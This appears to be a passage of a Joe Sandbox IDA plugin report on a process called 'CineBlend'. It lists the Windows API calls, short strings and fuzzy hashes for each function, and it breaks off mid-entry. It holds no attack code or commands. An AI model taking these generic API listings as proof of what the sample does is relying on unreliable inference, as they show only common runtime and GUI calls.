Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: f727995e0ba662997ba3c2ead98213d4cd79ba47fa4912d7bcf05a5aa6eda3b8
Instruction ID: 4955ac354d7cb055955b2d0ecdd58ceb7a6cf0974a0af647353da5423f31a608
Opcode Fuzzy Hash: f727995e0ba662997ba3c2ead98213d4cd79ba47fa4912d7bcf05a5aa6eda3b8
Instruction Fuzzy Hash: FE217F716112429FCB145F38CC48B6AB7E5EB45326F25466AB966C72E0FE309C50DB10

Function 00B636F2 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00B636E9,00B63355), ref: 00B63700
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B6370E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B63727
SetLastError.KERNEL32(00000000,?,00B636E9,00B63355), ref: 00B63779

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: af8dddebc45cf67fcf1d94eb42282b4df0c953b567ba236fc4ebb0ea51f60cd6
Instruction ID: e2d16cebfc1f1ffd26905cb3c0eb64b66e1650320d4a8db26e4739dad593d661
Opcode Fuzzy Hash: af8dddebc45cf67fcf1d94eb42282b4df0c953b567ba236fc4ebb0ea51f60cd6
Instruction Fuzzy Hash: 0401D4B661E7116EE62427F4ACC6B7E2BE4EB15F7572002BAF216451F0EF5A4D029140

Function 00B730E7 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00B72908,00C09B48,0000000C,00B63268,00000001,?,?), ref: 00B730EB
_free.LIBCMT ref: 00B7311E
_free.LIBCMT ref: 00B73146
SetLastError.KERNEL32(00000000), ref: 00B73153
SetLastError.KERNEL32(00000000), ref: 00B7315F
_abort.LIBCMT ref: 00B73165

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 9ca7759dafc601c3562b20e69447214d8c84233d133210d826ff4a9f0987f190
Instruction ID: fcef1d8609706a6f0fbd25b7a72cc129fe6f4c2b22f7f91dcf1c192dc6151170
Opcode Fuzzy Hash: 9ca7759dafc601c3562b20e69447214d8c84233d133210d826ff4a9f0987f190
Instruction Fuzzy Hash: 2DF0F43650050076C2222739AC06B5E13EADFC1F70F61C0A9F93CE22D2EF208A02A161

Function 00BD9480 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00B41F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00B41F87
Part of subcall function 00B41F2D: SelectObject.GDI32(?,00000000), ref: 00B41F96
Part of subcall function 00B41F2D: BeginPath.GDI32(?), ref: 00B41FAD
Part of subcall function 00B41F2D: SelectObject.GDI32(?,00000000), ref: 00B41FD6

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00BD94AA
LineTo.GDI32(?,00000003,00000000), ref: 00BD94BE
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00BD94CC
LineTo.GDI32(?,00000000,00000003), ref: 00BD94DC
EndPath.GDI32(?), ref: 00BD94EC
StrokePath.GDI32(?), ref: 00BD94FC

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: d4e053622e1de7a3e04659b7d5ec80a522e845de720b6c872138973f4d44d555
Instruction ID: b84f201d7baf0105ece0ab098ae0eec81864c3b6fb89aee4b1f7d0c6dfc93b8c
Opcode Fuzzy Hash: d4e053622e1de7a3e04659b7d5ec80a522e845de720b6c872138973f4d44d555
Instruction Fuzzy Hash: 2A115E7600110DBFDF029F94DC88FDABFACEB08360F00C062BA4946161D7719D55DBA0

Function 00BA5B61 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00BA5B7C
GetDeviceCaps.GDI32(00000000,00000058), ref: 00BA5B8D
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BA5B94
ReleaseDC.USER32(00000000,00000000), ref: 00BA5B9C
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00BA5BB3
MulDiv.KERNEL32(000009EC,00000001,?), ref: 00BA5BC5

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 88587c4ada28e651966238390b7f09bb810ab5a9f37ebb8840e3d14ab0c4b36e
Instruction ID: cee2ed30f567f63967bc2ed9db203f602714992beffa95767ae5c0f07855274a
Opcode Fuzzy Hash: 88587c4ada28e651966238390b7f09bb810ab5a9f37ebb8840e3d14ab0c4b36e
Instruction Fuzzy Hash: 69014875A01714BBDB105FA59C45F4EBFB8EB49751F0440A6FA45A7280D6709D00CBA0

Function 00B4327E Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00B432AF
MapVirtualKeyW.USER32(00000010,00000000), ref: 00B432B7
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00B432C2
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00B432CD
MapVirtualKeyW.USER32(00000011,00000000), ref: 00B432D5
MapVirtualKeyW.USER32(00000012,00000000), ref: 00B432DD

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: efec00f5cab3f95c815e754a2b28b8f1784349e9a7fde57c43ff492496eead40
Instruction ID: ddfc38d49eb91464cc10938b32bd511555efaf1a0d3442df7fd8e4474a760a4c
Opcode Fuzzy Hash: efec00f5cab3f95c815e754a2b28b8f1784349e9a7fde57c43ff492496eead40
Instruction Fuzzy Hash: 110167B0942B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5

Function 00BAF437 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00BAF447
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00BAF45D
GetWindowThreadProcessId.USER32(?,?), ref: 00BAF46C
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00BAF47B
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00BAF485
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00BAF48C

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 1490b1d7c990266b461a1753b2d3b0726de451a0702bef94984a31b2d27ceb5a
Instruction ID: 3854aec265a9e9b20ee3b273fd9661073b390db06f2b5d2f89b3dbe1144e1b6f
Opcode Fuzzy Hash: 1490b1d7c990266b461a1753b2d3b0726de451a0702bef94984a31b2d27ceb5a
Instruction Fuzzy Hash: C1F03032242158BBE7215B529C0EEEFBF7CEFC7B11F00005AF641A2190EBA05A01C6B5

Function 00B834D6 Relevance: 9.0, APIs: 6, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 00B834EF
SendMessageW.USER32(?,00001328,00000000,?), ref: 00B83506
GetWindowDC.USER32(?), ref: 00B83512
GetPixel.GDI32(00000000,?,?), ref: 00B83521
ReleaseDC.USER32(?,00000000), ref: 00B83533
GetSysColor.USER32(00000005), ref: 00B8354D

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: 38b647795b1d4a484a3d6811195eea3e5e4f08ca6eba6fc85a9e98e2b0967073
Instruction ID: f19d4ecb0dff989801ad5f6bd2aa20bbf85240ea8567a02638c4e9ef27d32335
Opcode Fuzzy Hash: 38b647795b1d4a484a3d6811195eea3e5e4f08ca6eba6fc85a9e98e2b0967073
Instruction Fuzzy Hash: A8012831501105EFDB506B64DC19BE9BBF5FB14721F5001A1F95AA31A0DF311E51EB50

Function 00BA21C1 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00BA21CC
UnloadUserProfile.USERENV(?,?), ref: 00BA21D8
CloseHandle.KERNEL32(?), ref: 00BA21E1
CloseHandle.KERNEL32(?), ref: 00BA21E9
GetProcessHeap.KERNEL32(00000000,?), ref: 00BA21F2
HeapFree.KERNEL32(00000000), ref: 00BA21F9

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 59add25d0cd1c31050629704071ead1561ca828d62d13334dbee222c9e7367d3
Instruction ID: 2670dbdf25d849d42c77c3253de15c7cf6777d829d79f8c701e0f04a53a5d06f
Opcode Fuzzy Hash: 59add25d0cd1c31050629704071ead1561ca828d62d13334dbee222c9e7367d3
Instruction Fuzzy Hash: 3FE0E576005105FBDB012FA1EC1C90AFF39FF49322B104222F26593070EF329420DB50

Function 00BACE7B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B441EA: _wcslen.LIBCMT ref: 00B441EF

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00BACF99
_wcslen.LIBCMT ref: 00BACFE0
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00BAD047
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00BAD075

Strings

0, xrefs: 00BACF5A

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: 67eaab8e4323074aab24d409a4d7cead2054c04de4d3c4f53f8405e75b8c9e72
Instruction ID: f744ce063a319bd13ee85ecc62f11359d801ee8e84e1960e5df2aba9540c8200
Opcode Fuzzy Hash: 67eaab8e4323074aab24d409a4d7cead2054c04de4d3c4f53f8405e75b8c9e72
Instruction Fuzzy Hash: 0A51DE7161C300AFD724AF28C895BAFBBE8EF47314F040AA9F996D31A0DB74C9458752

Function 00BCB7C4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 00BCB903

Part of subcall function 00B441EA: _wcslen.LIBCMT ref: 00B441EF

GetProcessId.KERNEL32(00000000), ref: 00BCB998
CloseHandle.KERNEL32(00000000), ref: 00BCB9C7

Strings

@, xrefs: 00BCB8D2
<, xrefs: 00BCB8CB

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: 5ec152dd652e903680ff1317b804ed849cf3c77fc2610f620bea86c5ea8f815e
Instruction ID: 64eaca929169c4fd0ed33fbb6f87c9d76c66b3a747c4872a1774350422df3f4c
Opcode Fuzzy Hash: 5ec152dd652e903680ff1317b804ed849cf3c77fc2610f620bea86c5ea8f815e
Instruction Fuzzy Hash: FB713475A00219DFCB14EFA4C495E9EBBF4FF08310F048499E956AB262CB74EE45CB90

Function 00BA7B05 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00BA7B6D
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00BA7BA3
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00BA7BB4
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00BA7C36

Strings

DllGetClassObject, xrefs: 00BA7BA9

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: e861521543a6feef0dc8816a3cfbd2272799d5b2f722aa9b1f19dfa83a4bbd26
Instruction ID: 1f668418f252587a440580ad9b67afac7dba5087f6a497c14ba58e1278b4d535
Opcode Fuzzy Hash: e861521543a6feef0dc8816a3cfbd2272799d5b2f722aa9b1f19dfa83a4bbd26
Instruction Fuzzy Hash: 4D418FB164C204EFDB15DF64DC84A9ABBF9EF45324B1480E9A9059F205EBB1D944CBA0

Function 00BD4818 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BD48D1
IsMenu.USER32(?), ref: 00BD48E6
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00BD492E
DrawMenuBar.USER32 ref: 00BD4941

Strings

0, xrefs: 00BD4825

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
API String ID: 3076010158-4108050209
Opcode ID: 64ea5966f3cd2b5e60b441e8b8146c968de06da3516621dfaa84247020db5aeb
Instruction ID: 4dedcd0cf333d2d360d5f6d1ad1c4b08b493265341f913f8da1fca190d893ff6
Opcode Fuzzy Hash: 64ea5966f3cd2b5e60b441e8b8146c968de06da3516621dfaa84247020db5aeb
Instruction Fuzzy Hash: F6416CB5A0120AEFDB10CF56D894EAABBF5FF06324F0441AAE94597350E734AD54CB60

Function 00BA272F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B4B329: _wcslen.LIBCMT ref: 00B4B333

Part of subcall function 00BA45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00BA4620

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00BA27B3
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00BA27C6
SendMessageW.USER32(?,00000189,?,00000000), ref: 00BA27F6

Part of subcall function 00B48577: _wcslen.LIBCMT ref: 00B4858A

Strings

ComboBox, xrefs: 00BA273D
ListBox, xrefs: 00BA2772

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: c85fe51c5d423cd1b0485adefa9261d0739491a72830e7eb88c167c3d706da14
Instruction ID: ebb9f69853d1f85c0c7d347c9b1eb980fcab170dd4470c4f28beae4f04cdc9d0
Opcode Fuzzy Hash: c85fe51c5d423cd1b0485adefa9261d0739491a72830e7eb88c167c3d706da14
Instruction Fuzzy Hash: 0621F371944104BFDB05ABA4D886CFEB7F8DF56360F1041AAF461A71E1DB384E0ADA60

Function 00BD39B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00BD3A29
LoadLibraryW.KERNEL32(?), ref: 00BD3A30
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00BD3A45
DestroyWindow.USER32(?), ref: 00BD3A4D

Strings

SysAnimate32, xrefs: 00BD3A04

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: c224114fb95be639202b4521737f208c7199a7a9783e529cc339e13a8ef61d6e
Instruction ID: 6c3adeaf1703d9ad1efae0df5265376544d296f3f935c5f1eaee65957857707b
Opcode Fuzzy Hash: c224114fb95be639202b4521737f208c7199a7a9783e529cc339e13a8ef61d6e
Instruction Fuzzy Hash: 0121D171200205ABEB108F64DC90FBFBBE9EB44B64F105656FA91922D2E771CD409B61

Function 00B650DD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00B6508E,00000003,?,00B6502E,00000003,00C098D8,0000000C,00B65185,00000003,00000002), ref: 00B650FD
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B65110
FreeLibrary.KERNEL32(00000000,?,?,?,00B6508E,00000003,?,00B6502E,00000003,00C098D8,0000000C,00B65185,00000003,00000002,00000000), ref: 00B65133

Strings

CorExitProcess, xrefs: 00B65108
mscoree.dll, xrefs: 00B650F6

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: dc88896637e4df4ac2a504f8266be952f6155d4f647d6374d4954677c045ed1e
Instruction ID: cbd8d7edc133365377beab8593fdcae860bbfc6e869c0203d8d1f8ee10a49e9b
Opcode Fuzzy Hash: dc88896637e4df4ac2a504f8266be952f6155d4f647d6374d4954677c045ed1e
Instruction Fuzzy Hash: DEF06234A41208BBDB119F95DC59BADBFF8EF08B52F0000A5F809B2160DF799E90DA94

Function 00B4663E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00B4668B,?,?,00B462FA,?,00000001,?,?,00000000), ref: 00B4664A
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00B4665C
FreeLibrary.KERNEL32(00000000,?,?,00B4668B,?,?,00B462FA,?,00000001,?,?,00000000), ref: 00B4666E

Strings

kernel32.dll, xrefs: 00B46642
Wow64DisableWow64FsRedirection, xrefs: 00B46656

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
